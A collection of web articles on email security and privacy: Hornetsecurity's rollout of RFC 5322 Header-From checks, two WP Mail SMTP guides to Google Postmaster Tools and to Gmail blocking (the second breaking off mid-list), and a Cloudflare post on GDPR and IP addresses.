Enhancing RFC-compliance for message header from addresses

06/02/2024

Hornetsecurity is implementing an update to enhance email security by enforcing checks on the “Header-From” value in emails, as per RFC 5322 standards.
This initiative is driven by several key reasons:

  1. Preventing Email Delivery Issues: Historically, not enforcing the validity of the originator email address has led to emails being accepted by our system but ultimately rejected by the final destination, especially with most customers now using cloud email service providers that enforce stricter validation.
  2. Enhanced Protection Against Spoofed Emails: By strictly validating the “Header-From” value, we aim to significantly reduce the risk of email spoofing.
  3. Enhance Email Authentication for DKIM/DMARC Alignment: By enforcing RFC 5322 compliance in the “Header-From” field, we can ensure better alignment with DKIM and DMARC standards, thereby significantly improving the security and authenticity of email communications.

The cause of malformed “From” headers often stems from incorrect email server configurations by the sender or from bugs in scripts or other applications. Our new protocol aims to rectify these issues, ensuring that all emails passing through our system are fully compliant with established standards, thus improving the overall security and reliability of email communications.

Implementation Timeline

  • Stage 1 (Starting 4 March 2024): 1-5% of invalid emails will be rejected.
  • Stage 2 (Second week): 30% rejection rate.
  • Stage 3 (Third week): 60% rejection rate.
  • Final Stage (By the end of the fourth week): 100% rejection rate.

Impact Assessment

Extensive testing over the past six months indicates that the impact on legitimate email delivery is expected to be minimal. However, email administrators should be prepared for potential queries from users experiencing email rejections.

Handling Rejections

When an email is rejected due to a malformed “Header-From”, the sender will receive a bounce-back message with the error “510 5.1.7 malformed Header-From according to RFC 5322”. This message indicates that the email did not meet the necessary header standards.

Identifying Affected Emails

Email administrators can identify affected emails in the Hornetsecurity Control Panel (https://cp.hornetsecurity.com) using the following steps:

  1. Navigate to ELT in the Hornetsecurity Control Panel.
  2. Select your tenant in the top right field.
  3. Choose a date range for your search. A shorter range will yield quicker results.
  4. Click in the “Search” text box, select the “Msg ID” parameter, and type in “hfromfailed” (exact string).
  5. Press ENTER to perform the search.

When email administrators identify emails affected by the “Header-From” checks in the Email Live Tracking (ELT) system, immediate and appropriate actions are necessary to verify if the email application or server settings are correctly configured to comply with RFC 5322 standards. This will help maintain email flow integrity.


Defining Exceptions

In implementing the new “Header-From” checks, Hornetsecurity recognizes the need for flexibility in certain cases. Therefore, we have provisioned for the definition of exceptions to these checks.

This section details how to set up these exceptions and the timeline for their deprecation:

Configuring Exceptions

  1. Accessing the Control Panel: Log in to the Hornetsecurity Control Panel at https://cp.hornetsecurity.com.
  2. Navigating to the Compliance Filter.
  3. Creating Exception Rules: Within the Compliance Filter, you can create rules that define exceptions to the “Header-From” checks. This should be based on the envelop sender address.
  4. Applying the Exceptions: Once defined, these exceptions will allow certain emails to bypass the strict “Header-From” checks.

Timeline for Deprecation of Exceptions applied to the new Header-From checks

  • Initial Implementation: The ability to define exceptions is available as part of the initial rollout of the “Header-From” checks.
  • Deprecation Date: These exception provisions are set to be deprecated by the end of June 2024.

The provision for exceptions is intended as a temporary measure to facilitate a smoother transition to the new protocol. By June 2024, it is expected that all email senders would have had sufficient time to align their email systems with RFC 5322 standards. Deprecating the exceptions is a step towards ensuring full compliance and maximizing the security benefits of the “Header-From” checks.

Conclusion

The enhancement of our RFC-compliance is a significant step toward securing email communications. Adherence to these standards will collectively reduce risks associated with email. For further assistance or clarification, please reach out to our support team at support@hornetsecurity.com.

 

Invalid “Header From” Examples:

Header From Reason 
From: <> Blank addresses are problematic as they cause issues in scenarios requiring a valid email address, such as allow and deny lists. 
From: John Doe john.doe@hornetsecurity.com Non-compliant with RFC standards. The email address must be enclosed in angle brackets (< and >) when accompanied by a display name. 
From: “John Doe” <john.doe@hornetsecurity.com> (Peter’s cousin) While technically RFC-compliant, such formats are often rejected by M365 unless explicit exceptions are configured. We do accept certain email addresses with comments. 
From: John, Doe <john.doe@hornetsecurity.com> Non-compliant with RFC standards. A display name containing a comma must be enclosed in double quotes. 
From: “John Doe <john.doe@hornetsecurity.com>” Non-compliant with RFC standards. The entire ‘From’ value is incorrectly enclosed in double quotation marks, which is not allowed. 
From: “John Doe <john.doe@hornetsecurity.com>” john.doe@hornetsecurity.com Non-compliant with RFC standards. The display name is present, but the email address is not correctly enclosed in angle brackets. 
From: “John Doe”<john.doe@hornetsecurity.com> Non-compliant with RFC standards due to the absence of white-space between the display name and the email address. 
From: “Nested Brackets” <<info@hornetsecurity.com> Nested angle brackets are not allowed in the “addr-spec” part of the email address. 
From: Peter Martin <e14011> Non-compliant with RFC standards. The domain part of the email address (“addr-spec”) is missing. 
From: “News” <news.@hornetsecurity.com> Non-compliant with RFC standards. The local part of the email address must not end with a dot. 
Missing “From” header altogether A “From” header is mandatory in emails. The absence of this header is a clear violation of RFC standards. 

Valid “Header From” Examples:

Header From Reason 
From: john.doe@hornetsecurity.com RFC-compliant 
From: <john.doe@hornetsecurity.com> RFC-compliant 
From: “Doe, John” <john.doe@hornetsecurity.com> RFC-compliant 
From: “John Doe” <john.doe@hornetsecurity.com> RFC-compliant 
From: < john.doe@hornetsecurity.com > RFC-compliant but not recommended because of the spaces between the email address and angle brackets 
From: John Doe <john.doe@hornetsecurity.com> Acceptable, although it is recommended that the display name is enclosed in double quotes if it contains any white-space. 

Source :
https://support.hornetsecurity.com/hc/en-us/articles/22036971529617-Enhancing-RFC-compliance-for-message-header-from-addresses

How to Set Up Google Postmaster Tools

Updated: Jan 31, 2024, 13:03 PM
By Claire Broadley Content Manager
REVIEWED By Jared Atchison Co-owner

Do you want to set up Postmaster Tools… but you’re not sure where to start?

Postmaster Tools lets you to monitor your spam complaints and domain reputation. That’s super important now that Gmail is blocking emails more aggressively.

Thankfully, Postmaster Tools is free and easy to configure. If you’ve already used a Google service like Analytics, it’ll take just a couple of minutes to set up.

In This Article

Who Needs Postmaster Tools?

You should set up Postmaster Tools if you meet any of the following criteria:

1. You Regularly Send Emails to Gmail Recipients

Postmaster Tools is a tool that Google provides to monitor emails to Gmail users.

Realistically, most of your email lists are likely to include a large number of Gmail mailboxes unless you’re sending to a very specific group of people, like an internal company mailing list. (According to Techjury, Gmail had a 75.8% share of the email market in 2023.)

Keep in mind that Gmail recipients aren’t always using Gmail email addresses. The people who use custom domains or Google Workspace are ‘hidden’, so it’s not always clear who’s using Gmail and who isn’t. To be on the safe side, it’s best to use it (it’s free).

2. You Send Marketing Emails (or Have a Large Website)

Postmaster Tools works best for bulk email senders, which Google defines as a domain that sends more than 5,000 emails a day.

If you’re sending email newsletters on a regular basis, having Postmaster Tools is going to help.

Likewise, if you use WooCommerce or a similar platform, you likely send a high number of transactional emails: password reset emails, receipts, and so on.

Reset password email

If you don’t send a large number of emails right now, you can still set up Postmaster Tools so you’re prepared for the time you might.

Just note that you may see the following message:

No data to display at present. Please come back later.
Postmaster Tools requires your domain to satisfy certain conditions before data is visible for this chart.

This usually means you’re not sending enough emails for Google to be able to calculate meaningful statistics.

It’s up to you if you want to set it up anyway, or skip it until your business grows a little more.

How to Add a Domain to Postmaster Tools

Adding a domain to Postmaster Tools is simple and should take less than 10 minutes.

To get started, head to the Postmaster Tools site and log in. If you’re already using Google Analytics, sign in using the email address you use for your Analytics account.

The welcome popup will already be open. Click on Get Started to begin.

Add a domain in Postmaster Tools

Next, enter the domain name that your emails come from.

This should be the domain you use as the sender, or the ‘from email’, when you’re sending emails from your domain. It will normally be your main website.

Enter domain name in Postmaster Tools

If your domain name is already verified for another Google service, that’s all you need to do! You’ll see confirmation that your domain is set up.

Domain added to Google Postmaster Tools

If you haven’t used this domain with Google services before, you’ll need to verify it. Google will ask you to add a TXT record to your DNS.

Postmaster Tools domain verification

To complete this, head to the control panel for the company you bought your domain from. It’ll likely be your domain name registrar or your web host. If you’re using a service like Cloudflare, you’ll want to open up your DNS records there instead.

Locate the part of the control panel that handles your DNS (which might be called a DNS Zone) and add a new TXT record. Copy the record provided into the fields.

Note: Most providers will ask you to enter a Name, which isn’t shown in Google’s instructions. If your provider doesn’t fill this out by default, you can safely enter @ in the Name field.

Verify domain by adding TXT record for Google Postmaster Tools

Now save your record and wait a few minutes. Changes in Cloudflare can be near-instant, but other registrars or hosts may take longer.

After waiting for your change to take effect, switch back to Postmaster Tools and hit Verify to continue.

Verify domain in Postmaster Tools

And that’s it! Now your domain has been added to Postmaster Tools.

Verified domain in Postmaster Tools

How to Read the Charts in Google Postmaster Tools

Google is now tracking various aspects of your email deliverability. It’ll display the data in a series of charts in your account.

Here’s a quick overview of what you can see.

As I mentioned, keep in mind that the data here is only counted from Gmail accounts. It’s not a domain-wide measurement of everything you send.

Spam Rate

Your spam rate is the number of emails sent vs the number of spam complaints received each day. You should aim to keep this below 0.1%.

You can do that by making it easy for people to unsubscribe from marketing emails and using double optins rather than single optins.

Example of a Postmaster Tools report for Gmail recipients

It’s normal for spam complaint rates to spike occasionally because Google measures each day in isolation.

If you’re seeing a spam rate that is consistently above 0.3%, it’s worth looking into why that’s happening. You might be sending emails to people who don’t want to receive them.

IP Reputation

IP reputation is the trustworthiness of the IP address your emails come from. Google may mark emails as spam if your IP reputation is poor.

IP reputation in Postmaster Tool

Keep in mind that IP reputation is tied to your email marketing provider. It’s a measure of their IP as well as yours.

If you see a downward trend, check in with the platform you’re using to ask if they’re seeing the same thing.

Domain Reputation

Domain reputation is the trustworthiness of the domain name you’ve verified in Postmaster Tools. This can be factored into Google’s spam scoring, along with other measurements.

Domain reputation in Postmaster Tools

The ideal scenario is a consistent rating of High, as shown in our screenshot above.

Wait: What is IP Reputation vs Domain Reputation?

You’ll now see that Google has separate options for IP reputation and domain reputation. Here’s the difference:

  • IP reputation measures the reputation of the server that actually sends your emails out. This might be a service like Constant Contact, ConvertKit, or Drip. Other people who use the service will share the same IP, so you’re a little more vulnerable to the impact of other users’ actions.
  • Domain reputation is a measure of the emails that are sent from your domain name as a whole.

Feedback Loop

High-volume or bulk senders can activate this feature to track spam complaints in more detail. You’ll need a special email header called Feedback-ID if you want to use this. Most likely, you won’t need to look at this report.

Authentication

This chart shows you how many emails cleared security checks.

In more technical terms, it shows how many emails attempted to authenticate using DMARC, SPF, and DKIM vs. how many actually did.

Postmaster Tools authentication

Encryption

This chart looks very similar to the domain reputation chart we already showed. It should sit at 100%.

If you’re seeing a lower percentage, you may be using outdated connection details for your email provider.

Check the websites or platforms that are sending emails from your domain and update them from an SSL connection to a TLS connection.

wp mail smtp host and port settings

Delivery Errors

Last but not least, the final chart is the most useful. The Delivery Errors report will show you whether emails were rejected or temporarily delayed. A temporary delay is labeled as a TempFail in this report.

This chart is going to tell you whether Gmail is blocking your emails, and if so, why.

If you see any jumps, click on the point in the chart and the reason for the failures will be displayed below it.

Delivery errors in Postmaster Tools

Small jumps here and there are not a huge cause for concern. However, very large error rates are a definite red flag. You may have received a 550 error or a 421 error that gives you more clues as to why they’re happening.

Here are the 3 most important error messages related to blocked emails in Gmail:

421-4.7.0 unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been temporarily rate limited.

550-5.7.1 Our system has detected an unusual rate of unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been blocked.

550-5.7.26 This mail is unauthenticated, which poses a security risk to the sender and Gmail users, and has been blocked. The sender must authenticate with at least one of SPF or DKIM. For this message, DKIM checks did not pass and SPF check for example.com did not pass with ip: 192.186.0.1.

If you’re seeing these errors, check that your domain name has the correct DNS records for authenticating email. It’s also a good idea to examine your emails to ensure you have the right unsubscribe links in them.

Note: WP Mail SMTP preserves the list-unsubscribe headers that your email provider adds. That means that your emails will have a one-click unsubscribe option at the top.

One click unsubscribe link

If you’re using a different SMTP plugin, make sure it’s preserving that crucial list-unsubscribe header. If it’s not there, If not, you may want to consider switching to WP Mail SMTP for the best possible protection against spam complaints and failed emails.

Fix Your WordPress Emails Now

Next, Authenticate Emails from WordPress

Are your emails from WordPress disappearing or landing in the spam folder? You’re definitely not alone. Learn how to authenticate WordPress emails and ensure they always land in your inbox.

Ready to fix your emails? Get started today with the best WordPress SMTP plugin. If you don’t have the time to fix your emails, you can get full White Glove Setup assistance as an extra purchase, and there’s a 14-day money-back guarantee for all paid plans.

If this article helped you out, please follow us on Facebook and Twitter for more WordPress tips and tutorials.

Source :
https://wpmailsmtp.com/how-to-set-up-google-postmaster-tools/

Reflecting on the GDPR to celebrate Privacy Day 2024

26/01/2024
Emily Hancock

10 min read

This post is also available in DeutschFrançais日本語 and Nederlands.

Reflecting on the GDPR to celebrate Privacy Day 2024

Just in time for Data Privacy Day 2024 on January 28, the EU Commission is calling for evidence to understand how the EU’s General Data Protection Regulation (GDPR) has been functioning now that we’re nearing the 6th anniversary of the regulation coming into force.

We’re so glad they asked, because we have some thoughts. And what better way to celebrate privacy day than by discussing whether the application of the GDPR has actually done anything to improve people’s privacy?

The answer is, mostly yes, but in a couple of significant ways – no.

Overall, the GDPR is rightly seen as the global gold standard for privacy protection. It has served as a model for what data protection practices should look like globally, it enshrines data subject rights that have been copied across jurisdictions, and when it took effect, it created a standard for the kinds of privacy protections people worldwide should be able to expect and demand from the entities that handle their personal data. On balance, the GDPR has definitely moved the needle in the right direction for giving people more control over their personal data and in protecting their privacy.

In a couple of key areas, however, we believe the way the GDPR has been applied to data flowing across the Internet has done nothing for privacy and in fact may even jeopardize the protection of personal data. The first area where we see this is with respect to cross-border data transfers. Location has become a proxy for privacy in the minds of many EU data protection regulators, and we think that is the wrong result. The second area is an overly broad interpretation of what constitutes “personal data” by some regulators with respect to Internet Protocol or “IP” addresses. We contend that IP addresses should not always count as personal data, especially when the entities handling IP addresses have no ability on their own to tie those IP addresses to individuals. This is important because the ability to implement a number of industry-leading cybersecurity measures relies on the ability to do threat intelligence on Internet traffic metadata, including IP addresses.  

Location should not be a proxy for privacy

Fundamentally, good data security and privacy practices should be able to protect personal data regardless of where that processing or storage occurs. Nevertheless, the GDPR is based on the idea that legal protections should attach to personal data based on the location of the data – where it is generated, processed, or stored. Articles 44 to 49 establish the conditions that must be in place in order for data to be transferred to a jurisdiction outside the EU, with the idea that even if the data is in a different location, the privacy protections established by the GDPR should follow the data. No doubt this approach was influenced by political developments around government surveillance practices, such as the revelations in 2013 of secret documents describing the relationship between the US NSA (and its Five Eyes partners) and large Internet companies, and that intelligence agencies were scooping up data from choke points on the Internet. And once the GDPR took effect, many data regulators in the EU were of the view that as a result of the GDPR’s restrictions on cross-border data transfers, European personal data simply could not be processed in the United States in a way that would be consistent with the GDPR.

This issue came to a head in July 2020, when the European Court of Justice (CJEU), in its “Schrems II” decision1, invalidated the EU-US Privacy Shield adequacy standard and questioned the suitability of the EU standard contractual clauses (a mechanism entities can use to ensure that GDPR protections are applied to EU personal data even if it is processed outside the EU). The ruling in some respects left data protection regulators with little room to maneuver on questions of transatlantic data flows. But while some regulators were able to view the Schrems II ruling in a way that would still allow for EU personal data to be processed in the United States, other data protection regulators saw the decision as an opportunity to double down on their view that EU personal data cannot be processed in the US consistent with the GDPR, therefore promoting the misconception that data localization should be a proxy for data protection.

In fact, we would argue that the opposite is the case. From our own experience and according to recent research2, we know that data localization threatens an organization’s ability to achieve integrated management of cybersecurity risk and limits an entity’s ability to employ state-of-the-art cybersecurity measures that rely on cross-border data transfers to make them as effective as possible. For example, Cloudflare’s Bot Management product only increases in accuracy with continued use on the global network: it detects and blocks traffic coming from likely bots before feeding back learnings to the models backing the product. A diversity of signal and scale of data on a global platform is critical to help us continue to evolve our bot detection tools. If the Internet were fragmented – preventing data from one jurisdiction being used in another – more and more signals would be missed. We wouldn’t be able to apply learnings from bot trends in Asia to bot mitigation efforts in Europe, for example. And if the ability to identify bot traffic is hampered, so is the ability to block those harmful bots from services that process personal data.

The need for industry-leading cybersecurity measures is self-evident, and it is not as if data protection authorities don’t realize this. If you look at any enforcement action brought against an entity that suffered a data breach, you see data protection regulators insisting that the impacted entities implement ever more robust cybersecurity measures in line with the obligation GDPR Article 32 places on data controllers and processors to “develop appropriate technical and organizational measures to ensure a level of security appropriate to the risk”, “taking into account the state of the art”. In addition, data localization undermines information sharing within industry and with government agencies for cybersecurity purposes, which is generally recognized as vital to effective cybersecurity.

In this way, while the GDPR itself lays out a solid framework for securing personal data to ensure its privacy, the application of the GDPR’s cross-border data transfer provisions has twisted and contorted the purpose of the GDPR. It’s a classic example of not being able to see the forest for the trees. If the GDPR is applied in such a way as to elevate the priority of data localization over the priority of keeping data private and secure, then the protection of ordinary people’s data suffers.

Applying data transfer rules to IP addresses could lead to balkanization of the Internet

The other key way in which the application of the GDPR has been detrimental to the actual privacy of personal data is related to the way the term “personal data” has been defined in the Internet context – specifically with respect to Internet Protocol or “IP” addresses. A world where IP addresses are always treated as personal data and therefore subject to the GDPR’s data transfer rules is a world that could come perilously close to requiring a walled-off European Internet. And as noted above, this could have serious consequences for data privacy, not to mention that it likely would cut the EU off from any number of global marketplaces, information exchanges, and social media platforms.

This is a bit of a complicated argument, so let’s break it down. As most of us know, IP addresses are the addressing system for the Internet. When you send a request to a website, send an email, or communicate online in any way, IP addresses connect your request to the destination you’re trying to access. These IP addresses are the key to making sure Internet traffic gets delivered to where it needs to go. As the Internet is a global network, this means it’s entirely possible that Internet traffic – which necessarily contains IP addresses – will cross national borders. Indeed, the destination you are trying to access may well be located in a different jurisdiction altogether. That’s just the way the global Internet works. So far, so good.

But if IP addresses are considered personal data, then they are subject to data transfer restrictions under the GDPR. And with the way those provisions have been applied in recent years, some data regulators were getting perilously close to saying that IP addresses cannot transit jurisdictional boundaries if it meant the data might go to the US. The EU’s recent approval of the EU-US Data Privacy Framework established adequacy for US entities that certify to the framework, so these cross-border data transfers are not currently an issue. But if the Data Privacy Framework were to be invalidated as the EU-US Privacy Shield was in the Schrems II decision, then we could find ourselves in a place where the GDPR is applied to mean that IP addresses ostensibly linked to EU residents can’t be processed in the US, or potentially not even leave the EU.

If this were the case, then providers would have to start developing Europe-only networks to ensure IP addresses never cross jurisdictional boundaries. But how would people in the EU and US communicate if EU IP addresses can’t go to the US? Would EU citizens be restricted from accessing content stored in the US? It’s an application of the GDPR that would lead to the absurd result – one surely not intended by its drafters. And yet, in light of the Schrems II case and the way the GDPR has been applied, here we are.

A possible solution would be to consider that IP addresses are not always “personal data” subject to the GDPR. In 2016 – even before the GDPR took effect – the Court of Justice of the European Union (CJEU) established the view in Breyer v. Bundesrepublik Deutschland that even dynamic IP addresses, which change with every new connection to the Internet, constituted personal data if an entity processing the IP address could link the IP addresses to an individual. While the court’s decision did not say that dynamic IP addresses are always personal data under European data protection law, that’s exactly what EU data regulators took from the decision, without considering whether an entity actually has a way to tie the IP address to a real person3.

The question of when an identifier qualifies as “personal data” is again before the CJEU: In April 2023, the lower EU General Court ruled in SRB v EDPS4 that transmitted data can be considered anonymised and therefore not personal data if the data recipient does not have any additional information reasonably likely to allow it to re-identify the data subjects and has no legal means available to access such information. The appellant – the European Data Protection Supervisor (EDPS) – disagrees. The EDPS, who mainly oversees the privacy compliance of EU institutions and bodies, is appealing the decision and arguing that a unique identifier should qualify as personal data if that identifier could ever be linked to an individual, regardless of whether the entity holding the identifier actually had the means to make such a link.

If the lower court’s common-sense ruling holds, one could argue that IP addresses are not personal data when those IP addresses are processed by entities like Cloudflare, which have no means of connecting an IP address to an individual. If IP addresses are then not always personal data, then IP addresses will not always be subject to the GDPR’s rules on cross-border data transfers.

Although it may seem counterintuitive, having a standard whereby an IP address is not necessarily “personal data” would actually be a positive development for privacy. If IP addresses can flow freely across the Internet, then entities in the EU can use non-EU cybersecurity providers to help them secure their personal data. Advanced Machine Learning/predictive AI techniques that look at IP addresses to protect against DDoS attacks, prevent bots, or otherwise guard against personal data breaches will be able to draw on attack patterns and threat intelligence from around the world to the benefit of EU entities and residents. But none of these benefits can be realized in a world where IP addresses are always personal data under the GDPR and where the GDPR’s data transfer rules are interpreted to mean IP addresses linked to EU residents can never flow to the United States.

Keeping privacy in focus

On this Data Privacy Day, we urge EU policy makers to look closely at how the GDPR is working in practice, and to take note of the instances where the GDPR is applied in ways that place privacy protections above all other considerations – even appropriate security measures mandated by the GDPR’s Article 32 that take into account the state of the art of technology. When this happens, it can actually be detrimental to privacy. If taken to the extreme, this formulaic approach would not only negatively impact cybersecurity and data protection, but even put into question the functioning of the global Internet infrastructure as a whole, which depends on cross-border data flows. So what can be done to avert this?

First, we believe EU policymakers could adopt guidelines (if not legal clarification) for regulators that IP addresses should not be considered personal data when they cannot be linked by an entity to a real person. Second, policymakers should clarify that the GDPR’s application should be considered with the cybersecurity benefits of data processing in mind. Building on the GDPR’s existing recital 49, which rightly recognizes cybersecurity as a legitimate interest for processing, personal data that needs to be processed outside the EU for cybersecurity purposes should be exempted from GDPR restrictions to international data transfers. This would avoid some of the worst effects of the mindset that currently views data localization as a proxy for data privacy. Such a shift would be a truly pro-privacy application of the GDPR.

1 Case C-311/18, Data Protection Commissioner v Facebook Ireland and Maximillian Schrems.
2 Swire, Peter and Kennedy-Mayo, DeBrae and Bagley, Andrew and Modak, Avani and Krasser, Sven and Bausewein, Christoph, Risks to Cybersecurity from Data Localization, Organized by Techniques, Tactics, and Procedures (2023).
3 Different decisions by the European data protection authorities, namely the Austrian DSB (December 2021), the French CNIL (February 2022) and the Italian Garante (June 2022), while analyzing the use of Google Analytics, have rejected the relative approach used by the Breyer case and considered that an IP address should always be considered as personal data. Only the decision issued by the Spanish AEPD (December 2022) followed the same interpretation of the Breyer case. In addition, see paragraphs 109 and 136 in Guidelines by Supervisory Authorities for Tele-Media Providers, DSK (2021).
4 Single Resolution Board v EDPS, Court of Justice of the European Union, April 2023.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/reflecting-on-the-gdpr-to-celebrate-privacy-day-2024/

Gmail Blocking Your Emails? Here’s How to Fix It (Feb 2024)

Updated: Jan 22, 2024, 15:17 PM
By Claire Broadley Content Manager
REVIEWED By Jared Atchison President and co-owner

Is Gmail blocking emails that you send? You’re not alone.

Google has always been strict in blocking rogue senders in its fight against spam.

In 2024, it’s tightening up the rules and enforcing tighter anti-spam limits. That means emails you send to Gmail mailboxes won’t arrive if you’re not compliant.

The amount of spam emails that Google’s servers deal with is mind-bogglingly huge. About half of all emails sent daily are spam, and according to The Tech Report, about 1.8 billion people use Gmail. It has a vested interest in keeping spam out of its customers’ inboxes.

This article explains who’s impacted by Google’s new sending requirements, what exactly will change this year, and what you need to do to ensure your emails are delivered.

Fix Your WordPress Emails Now

In This Article

Why Is Gmail Blocking My Emails?

Gmail is likely blocking your emails for one of 2 reasons. Either you’re on a spam blacklist already, or you don’t comply with its new requirements for bulk senders.

Reason 1. Google Put Your Domain On a Spam Blacklist

It only takes a few people to click Mark as Spam in Gmail for your domain reputation to be impacted. This can result in Gmail adding your email to a blacklist if the spam complaints build up.

Once you’re on a blacklist, you’ll have to earn the trust of email providers to be removed.

Rachel Adnyana, Email Deliverability Expert at SendLayer

“Getting off a blacklist is often not a straightforward task. It’s usually not just a case of requesting your removal – you’ll also have to show what you’ve done to resolve the issues that lead to your blacklisting in the first place. ”

-Rachel Adnyana, Email Deliverability Expert at SendLayer

Blacklists are not new, but the threshold for being added to one is lower than it once was.

The telltale sign that you’re on a blacklist is an error like this:

421-4.7.0 unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been temporarily rate limited.

550-5.7.1 Our system has detected an unusual rate of unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been blocked.

You may see a different 500 error when sending an email if you’re impacted by this. You can look through the SendLayer error library if you see an error you don’t understand.

If you don’t see errors, try running your domain name or sender IP through the blacklist checker at MXToolbox:

Stop WordPress emails going to spam with blacklist check

We’ll explain how you can resolve this problem in just a minute. First, let’s look at the other possible cause of emails to Gmail being blocked.

Reason 2. Your Emails Aren’t Authenticated

Emails are often sent without authentication, but they are sometimes delivered anyway.

If you have a WordPress website, it’ll send emails without authentication by default. You will likely find them in your spam folder.

Gmail contact form entry in spam folder

Some Gmail users will find their contact form emails don’t arrive at all.

As email providers become less tolerant of unauthenticated emails, we’re seeing more support tickets from customers whose WordPress emails go to spam. Some say they used to be delivered, but now aren’t. It’s confusing when this happens. “I didn’t change anything, so why did my emails stop sending?”

It’s not that your website changed. It’s more likely that the rules for detecting spam got tougher. Soon, senders who don’t authenticate their emails will be blocked from emailing Gmail recipients at all.

The telltale sign is an error like this:

550-5.7.26 This mail is unauthenticated, which poses a security risk to the sender and Gmail users, and has been blocked. The sender must authenticate with at least one of SPF or DKIM. For this message, DKIM checks did not pass and SPF check for example.com did not pass with ip: 192.186.0.1.

You can see more details about error 550-5.7.26 in the SendLayer error library.

As you can see, Google is cracking down on domains that don’t have SPF, DMARC, and DKIM configured. If you’re not sure what that means, I’ll explain more in the next section.

Who Do Gmail’s New Rules Apply To?

Initially, the SPF, DMARC, and DKIM requirement will apply to bulk senders. Google defines a bulk sender as a domain that has, at some point, sent more than 5,000 emails to Gmail recipients in a single day.

  • ‘Gmail recipients’ means anyone with an email ending @gmail.com or @googlemail.com, and people who are using custom domains or Google Workspace to receive emails.
  • You only need to send 5,000 emails once to be considered a bulk sender forever. Remember: this applies to all emails you send from your domain.

Email authentication is best practise and should be set up to maintain good deliverability — even if you’re not considered a bulk sender.

How to Stop Gmail Blocking Your Emails

Now to the important part. How do you stop Gmail blocking the emails you send?

Email deliverability issues can seriously harm your business. If you use Google Workspace, they could even prevent you from sending emails to your own employees.

If your newsletters are considered to be spam, and people mark them as such, that could mean your purchase receipts don’t get through in the future.

No matter why Gmail is blocking your emails, the solutions are the same. First, let’s set up a free reporting tool so you can see your email spam complaints.

1. Set Up Google Postmaster Tools (Bulk Senders)

Google Postmaster Tools is a free tool that will show you exactly what your spam complaint rate is.

If you send a large number of emails, it’s worth creating an account because it will allow you to understand your current standing with Gmail.

You’ll need to authenticate your domain before your spam complaint rate appears. If you’ve already authenticated it for services like Google Analytics, you may find that setup is almost instant.

Verified domain in Postmaster Tools

If you see any spikes in Postmaster Tools’ spam reporting, or you’re consistently maintaining a level of spam complaints over 0.1%, you might not be able to send emails to Gmail recipients (and that includes customers on Google Workspace).

The absolute maximum spam complaint rate that Google will tolerate is 0.3%.

Example of a Postmaster Tools report for Gmail recipients

If your spam complaints are trending higher, it’s a sign you need to get to the bottom of the causes. People could be marking emails as spam for all kinds of reasons, but here are a few that Google has specifically highlighted:

  • You might be sending emails to people who are not expecting to receive them.

Trying to get people on a mailing list to inflate the size can be tempting. After all, you’ll cast a wider net when you send out a marketing email.

But it will could your deliverability too. More people will mark your emails as spam if you don’t give them any choice.

  • You might not be making it easy for people to unsubscribe.

You need to have a way for people to unsubscribe from your emails. You also need to implement a one-click unsubscribe list header if your email marketing platform supports that.

  • People could be sending spam through your website forms.

This is surprisingly common. If you don’t protect your contact form from spam, the junk email that passes through it hurts your deliverability because it appears to come from your domain.

  • You have a security issue on your website and you’re spamming people without even knowing.

In WordPress, there are a few common causes of poor security:

  • Poor security on your WordPress admin account, meaning your passwords are easy to guess and other people can get into your dashboard.
  • Nulled plugins, which can contain malicious code, including code that sends spam or phishing emails.
  • Poor security on your hosting account; for example, if you have a VPS, you need to watch out for hackers getting access and setting up SMTP relays that blast out emails without you knowing.

All in all, this is about keeping a close eye on what you’re sending and who you’re sending to.

2. Authenticate Emails From WordPress

If you’re still using WordPress without an SMTP plugin, we highly recommend that you install one to stop messages to Gmail from being blocked.

WP Mail SMTP steps in to handle all outgoing email from your WordPress site, routing it through a proper email provider. That authenticates the emails and stops them from being blocked.

WP Mail SMTP easy to set up thanks to the Setup Wizard and it supports many popular email platforms.

Choosing a mailer in the WP Mail SMTP setup wizard

You can also purchase the additional plugin setup service if you need a hand getting your email authentication working.

Add White Glove Setup

The Pro version of WP Mail SMTP is worth it because it adds lots of useful email logging and routing features. But if you just need to fix blocked emails to Gmail, the free version of WP Mail SMTP will do that.

Read more about setting up WordPress emails with authentication using WP Mail SMTP.

3. Implement DKIM, DMARC, and SPF

We already talked about issues that can arise without proper authentication.

You can authenticate your emails by ensuring they have the correct email headers: DKIM, SPF, and DMARC.

These 3 records prove that the emails you send are from you — the domain owner — not a random person pretending to be you.

What Are DMARC, SPF, and DKIM

In the past, you could get away without setting up these records, but Google will no longer allow you to skip this. If you’re seeing the 5.7.26 error from Gmail, you need to review your DNS records to figure out what’s missing.

Your email provider(s) will typically provide all 3 records and explain how to add them to your DNS. If you need a little more help, we have a few blog posts to help you understand what’s required:

Just to add: Google also requires a PTR record, which is sometimes called forward reverse DNS, or full circle DNS.

Full circle reverse DNS lookup for PTR record

Your web host or email provider should handle the creation and management of your PTR record, but it’s worth checking that it has been set up, just to rule out any future problems. See our post on What is a PTR record? to find out more.

Once your DNS has been set up, send a test email to AboutMy.Email, which will check your email for compliance.

4. Use the Correct From Email When Sending

The From Email is the sender email — the email address your emails appear to come from.

You should send emails from an email address at the same domain as your website. In other words, don’t authenticate your domain and send emails from a totally different account elsewhere.  Make sure everything matches.

WP Mail SMTP has settings specifically to allow you to set the from email (and the corresponding from name):

from name and from email

What about real email addresses vs fake ones? It’s good practise to avoid using noreply@domain.com (or any non-existent email address) as a From Email.

5. Send Email With TLS

When you’re sending emails through WordPress (or any other platform) using an SMTP server, you should use a provider that uses TLS to make the connection.

TLS stands for Transport Layer Security. It’s better than SSL because it’s more secure, and the end goal is that TLS will eventually replace the older SSL protocol.

wp mail smtp host and port settings

We don’t need to go into a huge amount of detail on this. Most email providers will support TLS so you may already be using it. But it’s worth double-checking your account to make sure you’re using the latest settings.

6. Add Unsubscribe Links to Marketing Emails

Most businesses send transactional emails and marketing emails.

So what’s the difference?

  • Transactional emails are emails that are necessary for the normal operation of your business. Password reset emails, renewal reminders, and receipts are all transactional. These kinds of emails usually need to be delivered immediately to be effective.
